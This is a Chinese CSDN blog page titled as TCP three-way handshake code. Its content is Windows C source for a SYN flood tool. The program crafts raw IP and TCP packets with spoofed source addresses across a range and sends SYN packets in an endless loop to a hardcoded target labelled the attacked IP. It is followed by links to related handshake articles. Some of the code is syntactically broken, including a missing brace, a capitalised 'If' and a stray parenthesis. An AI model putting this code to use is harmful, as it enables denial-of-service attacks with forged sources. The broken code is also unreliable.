TCP/IP三次握手代码

最新推荐文章于 2023-07-15 21:03:27 发布
最新推荐文章于 2023-07-15 21:03:27 发布
阅读量655 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013282505/article/details/17959549
版权
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>

#define SEQ 0x28376839
#define SYN_DEST_IP "10.10.11.7"//被攻击的IP
#define FAKE_IP "10.10.11.1"       //伪装IP的起始值,本程序的伪装IP覆盖一个B类网段
#define STATUS_FAILED 0xFFFF      //错误返回值
typedef struct _iphdr              //定义IP首部
{
    unsigned char h_verlen;            //4位首部长度,4位IP版本号
    unsigned char tos;               //8位服务类型TOS
unsigned short total_len;      //16位总长度(字节)
    unsigned short ident;            //16位标识
    unsigned short frag_and_flags;  //3位标志位
    unsigned char  ttl;              //8位生存时间 TTL
    unsigned char proto;         //8位协议 (TCP, UDP 或其他)
    unsigned short checksum;        //16位IP首部校验和
    unsigned int sourceIP;            //32位源IP地址
    unsigned int destIP;         //32位目的IP地址
}IP_HEADER;

struct                              //定义TCP伪首部
{
unsigned long saddr;     //源地址
unsigned long daddr;     //目的地址
char mbz;
char ptcl;                   //协议类型
unsigned short tcpl;     //TCP长度
}psd_header;

typedef struct _tcphdr             //定义TCP首部
{
    USHORT th_sport;               //16位源端口
    USHORT th_dport;               //16位目的端口
    unsigned int th_seq;         //32位序列号
    unsigned int th_ack;         //32位确认号
    unsigned char th_lenres;        //4位首部长度/6位保留字
    unsigned char th_flag;            //6位标志位
    USHORT th_win;                 //16位窗口大小
    USHORT th_sum;                 //16位校验和
    USHORT th_urp;                 //16位紧急数据偏移量
}TCP_HEADER;

//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)

unsigned long cksum=0;
while(size>1) {
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if(size) {
cksum+= *(UCHAR*)buffer;
}
cksum=(cksum>>16)+(cksum&0xffff);
cksum+=(cksum >>16);
return (USHORT)(~cksum);
}
//  SynFlood主函数
int main()
{
    int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost;
    int TimeOut=2000,SendSEQ=0;
    char SendBuf[128]={0};
    char RecvBuf[65535]={0};
    WSADATA wsaData;
    SOCKET SockRaw=(SOCKET)NULL;
    struct sockaddr_in DestAddr;
    IP_HEADER ip_header;
    TCP_HEADER tcp_header;
    //初始化SOCK_RAW
    if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
        fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode);
        ExitProcess(STATUS_FAILED);
    }
    SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED));
if (SockRaw==INVALID_SOCKET){
        fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError());
        ExitProcess(STATUS_FAILED);
    }
    flag=TRUE;
    //设置IP_HDRINCL以自己填充IP首部
    ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
If (ErrorCode==SOCKET_ERROR)  printf("Set IP_HDRINCL Error!\n");
    __try{
       //设置发送超时
        ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
if(ErrorCode==SOCKET_ERROR){
            fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError());
            __leave;
        }
        memset(&DestAddr,0,sizeof(DestAddr));
        DestAddr.sin_family=AF_INET;
        DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);
        FakeIpNet=inet_addr(FAKE_IP);
        FakeIpHost=ntohl(FakeIpNet);
        //填充IP首部
        ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long));
//高四位IP版本号,低四位首部长度
        ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));     //16位总长度(字节
        ip_header.ident=1;                                                       //16位标识
        ip_header.frag_and_flags=0;                                               //3位标志位
        ip_header.ttl=128;                                                       //8位生存时间TTL
ip_header.proto=IPPROTO_TCP;                                          //8位协议(TCP,UDP…)
        ip_header.checksum=0;                                                    //16位IP首部校验和
        ip_header.sourceIP=htonl(FakeIpHost+SendSEQ);                          //32位源IP地址
        ip_header.destIP=inet_addr(SYN_DEST_IP);                               //32位目的IP地址
//填充TCP首部
        tcp_header.th_sport=htons(7000);                                      //源端口号
        tcp_header.th_dport=htons(8080);                                      //目的端口号
        tcp_header.th_seq=htonl(SEQ+SendSEQ);                                  //SYN序列号
        tcp_header.th_ack=0;                                                 //ACK序列号置为0
        tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0);                        //TCP长度和保留位
        tcp_header.th_flag=2;                                                    //SYN 标志
        tcp_header.th_win=htons(16384);                                           //窗口大小
        tcp_header.th_urp=0;                                                 //偏移
        tcp_header.th_sum=0;                                                 //校验和
        //填充TCP伪首部(用于计算校验和,并不真正发送)
        psd_header.saddr=ip_header.sourceIP;                                    //源地址
        psd_header.daddr=ip_header.destIP;                                      //目的地址
        psd_header.mbz=0;
        psd_header.ptcl=IPPROTO_TCP;                                            //协议类型
        psd_header.tcpl=htons(sizeof(tcp_header));                              //TCP首部长度
        while(1) {
            //每发送10,240个报文输出一个标示符
            printf(".");
            for(counter=0;counter<10240;counter++){
                if(SendSEQ++==65536) SendSEQ=1;                                  //序列号循环
                //更改IP首部
                ip_header.checksum=0;                                            //16位IP首部校验和
                ip_header.sourceIP=htonl(FakeIpHost+SendSEQ);                  //32位源IP地址
                //更改TCP首部
                tcp_header.th_seq=htonl(SEQ+SendSEQ);                          //SYN序列号
                tcp_header.th_sum=0;                                         //校验和
                //更改TCP Pseudo Header
                psd_header.saddr=ip_header.sourceIP;                   
                //计算TCP校验和,计算校验和时需要包括TCP pseudo header         
                memcpy(SendBuf,&psd_header,sizeof(psd_header));   
                memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
                tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));
                //计算IP校验
                memcpy(SendBuf,&ip_header,sizeof(ip_header));
                memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
                memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4);
                datasize=sizeof(ip_header)+sizeof(tcp_header);
                ip_header.checksum=checksum((USHORT *)SendBuf,datasize);
                //填充发送缓冲区
                memcpy(SendBuf,&ip_header,sizeof(ip_header));
                //发送TCP报文
                ErrorCode=sendto(SockRaw,
SendBuf,
datasize,
0,
(struct sockaddr*) &DestAddr,
sizeof(DestAddr));
if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError());
            }//End of for
        }//End of While
    }//End of try
__finally {
if(SockRaw != INVALID_SOCKET) closesocket(SockRaw);
WSACleanup();
}
return 0;
}
zhaohuaxish919
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
TCP/IP 三次握手代码笔记
小白Alex的博客
01-17 964
//server #include #include #include #include #include using namespace std; char buf[512]; int nByte; int main() { //create socket int fd = 0; if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
tcp/ip三次握手四次死挥手
07-27
TCP/IP 协议群,三次握手四次死挥手 TCP/IP 协议群是计算机网络中最重要的基础协议之一,它是指一组使用 IP 进行通信时所必须用到的协议的统称。TCP/IP 协议群包括 IP、ICMP、TCP、UDP、TELNET、FTP、HTTP 等协议,...
能将三次握手理解到这个深度,面试官拍案叫绝!
zhangyanfei01的专栏
07-22 348
大家好,我是飞哥!在后端相关岗位的入职面试中,三次握手的出场频率非常的高,甚至说它是必考题也不为过。一般的答案都是说客户端如何发起 SYN 握手进入 SYN_SENT 状态,服务器响应 S...
TCP三次握手代码分析与过程跟踪
jisuanji198509的博客
07-05 1136
https://www.cnblogs.com/luoyang712/p/12099983.html 1.内核TCP三次握手代码分析 首先客户端调用connect主动发起连接 SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr, int, addrlen) { return __sys_connect(fd, uservaddr, addrlen); } int __sys_con
TCP三次握手的过程、状态码
m0_52586092的博客
08-16 687
开始, 客户端和服务器都处于 CLOSE 状态。 此时, 客户端向服务器主动发出连接请求, 服务器被动接受连接请求。 1, sever服务器进程先创建传输控制块TCB, 时刻准备接受客户端进程的连接请求, 此时服务器就进入了 LISTEN(监听)状态。 2, client客户端进程也是先创建传输控制块TCB, 然后向sever服务器发出连接请求报文(第一次握手),此时: 报文首部中的同步标志位SYN=1, 同时选择一个初始序列号 seq = j, 此时,TCP客户端client进程进入了 SYN-SENT(
TCP三次握手
weixin_45696837的博客
03-05 3105
TCP三次握手
TCP/IP协议三次握手四次挥手的原理及流程分析
08-28
主要介绍了TCP/IP协议三次握手四次挥手的原理及流程分析,具有一定参考价值,需要的朋友可以了解下。
浅析TCPIP三次握手机制的安全性.pdf
06-24
讲解TCPip三次握手机制,是如何保证安全性和准确性的
http.rar_http socket_tcp/ip http_握手机制
09-20
socket通讯原理以及tcpip三次握手机制分析。
TCP/IP 三次握手
人生代码,代码人生。。。
04-07 823
TCP/IP协议中,TCP协议提供可靠的连接服务,采用三次握手建立一个连接。 第一次握手:建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认; 第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态;   第三次握手:客
TCP三次握手
一条单行线
05-13 160
TCP三次握手 传输控制协议TCP,Transmission Control Protocol是一种面向连接的、可靠的、基于字节流的传输层通信协议,其是运行在OSI七层模型中的运输层,为了在不可靠的互联网络上提供可靠的端到端字节流而专门设计的一个传输协议三次握手 过程 client server 主动打开 → SYN=1,seq=x → 被动打开,接收 (同步已发送)
TCP源码浅读(5)三次握手-主动方接收SYN+ACK
Chlapis的博客
05-08 848
主动方调用 connect 函数向被动方发起第一次握手后一直处于阻塞状态,直到收到被动方的响应,即第二次握手,主动方才可以继续接下来的处理。
深入理解Linux网络——TCP连接建立过程(三次握手源码详解)
qq_25046827的博客
07-15 1896
icsk->icsk_accept_queue定义在inet_connection_sock下,是一个request_sock_queue类型的对象,是内核用来接收客户端请求的主要数据结构。我们平时说的全连接队列、半连接队列全都是在这个数据结构里实现的。我们来看具体的代码。// 全连接队列 struct request_sock * rskq_accept_head;// 半连接队列 struct listen_sock * listen_opt;
TCP建立连接过程(深入源码理解3次握手
06-22 1417
TCP源码上深入了解三次握手过程 connect 作用把本地socket状态设置成TCP_SYN_SENT;选择一个可用的端口,发出SYN握手请求并重置定时器; .send_synack就是tcp_v4_send_synack 服务端响应SYN客户端收到服务端发来的syn+ack包的时候,进入tcp_rcv_state_process step1: step2 step3: 总结 step1:创建子socket;添加全连接队列 ......
TCP源码浅读(6)三次握手-被动方接收ACK
Chlapis的博客
05-14 403
1、首先查找 sock,会在 ehash 中找到代表半连接的 request_sock,它处于 TCP_NEW_SYN_RECV 状态; 2、根据 request_sock 关联到 inet_listen_hashbucket 监听该端口的 tcp_sock (TCP_LISTEN); 3、调用子流程 tcp_check_req 对 ACK 包做合法性检查,检查通过后,创建一个新的 tcp_sock ,用来表示和客户端的全连接; 4、对新的 tcp_sock 进一步处理。
TCP三次握手,看不懂的同学可以来看这里。(超详细讲解)
左不言的博客
06-17 2316
第一次握手:建立连接时,发送包(到,并进入状态,等待服务器确认;syn:同步序列号(收到发送的包,必须确认客户的,同时自己也发送一个包(),即包,此时服务器进入状态;ack: 确认收到的包,向发送确认包,此包发送完毕,客户端和服务器进入(TCP连接成功)状态,完成三次握手。established: 建立成功了。
三次握手linux 源码分析
techtitan的专栏
08-13 1389
三次握手协议在linux内核中的实现 http://blog.csdn.net/jccz_zys/article/details/1503252
TCP/IP协议三次握手与四次握手流程解析
热门推荐
Jungle_hello的博客
05-20 1万+
一、TCP报文格式 图1 TCP报文格式上图中有几个字段需要重点介绍下: (1)序号:Seq序号,占32位,用来标识从TCP源端向目的端发送的字节流,发起方发送数据时对此进行标记。 (2)确认序号:Ack序号,占32位,只有ACK标志位为1时,确认序号字段才有效,Ack=Seq+1。 (3)标志位:共6个,即URG、ACK、PSH、RST、SYN、FIN等,具体含义如下:
tcp/ip三次握手四次挥手
最新发布
07-27
TCP/IP协议中的三次握手是为了在客户端和服务端建立一个安全可靠的连接。在第三次握手时,客户端能够发出第三次握手报文,表示已经接收到来自服务端的第二次握手报文,从而确认连接的建立。此时,服务端的状态会切换...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值